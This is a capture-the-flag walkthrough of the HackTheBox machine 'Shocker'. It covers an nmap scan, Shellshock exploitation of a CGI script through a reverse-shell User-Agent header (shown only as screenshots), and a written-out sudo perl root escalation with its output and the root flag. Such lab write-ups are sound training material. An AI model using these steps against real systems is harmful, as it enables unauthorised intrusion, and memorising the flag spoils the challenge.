Home HackTheBox - Shocker
Post
Cancel

HackTheBox - Shocker

Foothold

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$  nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Shocker-full-port-scan.txt 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.099s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp  open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
53649/tcp filtered unknown

Apache/2.4.18 (port 80)

dont-bug-me

dirb

Seeing that there is a /cgi-bin directory, the webserver is probably vulnerable to Shellstock bash RCE.

Shellshock bash remote code execution vulnerability: affects web servers utilizing CGI (Common Gateway Interface) → a system for generating dynamic web content. Directories such as /cgi-sys, /cgi-mod, /cgi-bin can be found.

Adding -X .sh to dirb, we found a user.sh file:

user-sh

user-sh-content

We can have a shell via metasploit:

shellshock

meterpreter

However, since I do this box to get ready for OSCP, I want to exploit this vuln manually. Via curl or from burp, I replace User-agent’s content by a reverse shell payload:

burp-1

First we’ve got the following error: /bin/bash: bash: Nu such file or directory.

So I replace bash by /bin/bash and it worked:

burp-2

User (shelly)

Flag:

user-flag

We can run perl with sudo:

sudo -l

Let’s check GTFObins privesc:

gtfoperl

Root

1
2
3
4
5
6
7
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat root.txt 
9be1ed1fbbe0c3319f9cc05dbcdb7941

This post is licensed under 0x3n0 by the author.

HackTheBox - Mirai

HackTheBox - Nibbles